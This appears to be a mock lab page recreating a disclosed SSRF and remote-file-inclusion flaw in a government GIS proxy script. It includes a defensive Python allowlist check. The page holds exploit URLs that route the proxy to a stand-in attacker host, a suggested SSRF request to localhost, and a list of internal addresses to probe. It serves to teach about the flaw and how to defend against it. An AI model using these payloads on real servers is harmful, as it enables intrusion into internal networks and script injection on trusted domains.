U.S. Department of Defense — Geospatial Intelligence Services — National Geospatial-Intelligence Agency — Authorized Use Only
GEOINT Data Portal
ArcGIS Enterprise 10.9.1 — Geospatial Intelligence Services
UNCLASSIFIED // FOUO
Contents 5 layers
Operational Layers
countryBoundaryLayer WMS
Service: wms.geoint.mil/boundary
militaryBaseLayer WMS
terrainElevation WFS
populationDensity WMS
coastlineFeatures WFS
Basemap
Light Gray Canvas Base
WMS Services
NGA Primary Services
wms.geoint.mil/boundary
wms.geoint.mil/terrain
Proxy Endpoint
/proxys/plain.php
⚠ No URL whitelist enforced
Lat 38.8977° N  |  Lon 77.0365° W | Zoom 3 | EPSG:4326
[Map view: world map with region labels (Canada, United States, Brazil, Africa, Russia, China, Australia) and city markers (Washington DC, London, Moscow, Beijing)]
Legend
countryBoundaryLayer
Military Installations
Terrain Elevation
Population Density
Coastline Features
2,500 km
Esri, NGA, DoD | Sources: NGA, USGS
5 layers active | Map: Light Gray Canvas (EPSG:4326) | Proxy: /proxys/plain.php ⚠ plain.php allows unrestricted URL fetch
plain.php — WMS Proxy Service
GET /proxys/plain.php
HackerOne #192940

// Normal WMS service request — fetches layer metadata
https://████.mil/████/proxys/plain.php?url=http://wms.geoint.mil/boundary/ows&operation=GetParameterInfo&parameter=countryBoundaryLayer&outputFormat=JSON

// No IP/domain whitelist — fetches ANY url including attacker-controlled hosts
https://████.mil/████/proxys/plain.php?url=http://attacker_server/t.html&operation=GetParameterInfo&parameter=countryBoundaryLayer&outputFormat=JSON
operation
parameter
outputFormat
The url parameter is fetched server-side with no whitelist. Try: http://127.0.0.1/1002.php?internal=secret for SSRF, or any attacker-controlled domain for RFI.
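The check the proxy lacks, as an added example (not code from this page or from the reported application): validate the url parameter against a host allowlist and refuse names that resolve to internal address space before any server-side fetch. The allowlist contents, function names and the stand-in resolver are assumptions for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: the proxy only ever needs the WMS host shown on the page.
ALLOWED_HOSTS = {"wms.geoint.mil"}
ALLOWED_PORTS = {80, 443}


def resolve(host):
    # Every address the name currently resolves to (IPv4 and IPv6).
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def check_proxy_url(url, resolver=resolve):
    """Return (allowed, reason, pinned_ips) for a proxy `url` parameter."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "malformed URL", []
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed", []
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed", []
    host = (parts.hostname or "").rstrip(".").lower()
    if host not in ALLOWED_HOSTS:
        return False, "host not on allowlist", []
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed", []
    try:
        ips = resolver(host)
    except OSError:
        return False, "host does not resolve", []
    # An allowlisted name must never point at loopback/private/link-local space.
    if not ips or any(not ipaddress.ip_address(ip).is_global for ip in ips):
        return False, "does not resolve to public addresses only", []
    # The fetch must connect to one of these IPs (no second DNS lookup) and
    # re-run this check on every redirect target instead of following blindly.
    return True, "ok", ips


if __name__ == "__main__":
    public = lambda host: ["8.8.8.8"]  # constructed stand-in resolver (offline)
    for u in ("http://wms.geoint.mil/boundary/ows", "http://attacker_server/t.html",
              "http://127.0.0.1/1002.php?internal=secret", "http://10.10.2.15/"):
        print(u, "->", check_proxy_url(u, public)[:2])
```

Returning the resolved addresses lets the caller pin the connection to exactly what was validated, so a later DNS change cannot redirect the fetch to an internal host.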

            
          
Service Info
Host: ████.mil
Server: Apache/2.4 PHP 5.6
Script: /proxys/plain.php
Auth: None (unauthenticated)
Whitelist: Not configured
Reported: Dec 21, 2016
Resolved: Mar 20, 2018
Attack Vectors
Remote File Inclusion
Fetch attacker-controlled HTML/PHP via url=
XSS via Rendered Content
Remote HTML with <script> fires on DoD domain
SSRF — Internal Access
Proxy reaches internal resources invisible from outside
SSRF — Internal Network
Click to probe via proxy:
http://127.0.0.1/
http://localhost/
http://10.10.2.15/
http://10.10.2.1/
http://192.168.1.1/
WMS Operations
GetCapabilities (GET)
GetMap (GET)
GetFeatureInfo (GET)
GetParameterInfo (GET)